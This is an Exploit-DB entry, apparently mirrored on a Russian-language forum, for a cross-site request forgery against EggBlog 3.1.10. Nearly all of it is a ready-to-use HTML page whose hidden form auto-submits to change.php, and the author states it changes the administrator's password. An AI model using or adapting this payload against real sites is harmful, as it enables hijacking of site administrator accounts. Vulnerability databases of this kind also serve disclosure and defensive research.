- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7633
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-01-01
Код:
| |
| Project: EggBlog v 3.1.10 |
| Author: x0r |
| Email: andry2000[at]hotmail[dot]it |
|________________________________________________________________________|
Code:
<html>
<title>x0r :P </title>
<form id="forum-form" name="forumform"
method="post" action="http://[site]/[path]/change.php">
<input type="hidden"
size="30" id="forumpassword" name="password" />
<input type="hidden"
name="submit" value="Submit" />
<script>document.forumform.submit()</script>
</form>
</HTML>
With this csrf you can change the admin pass ^ ^
# milw0rm.com [2009-01-01]
- Источник
- www.exploit-db.com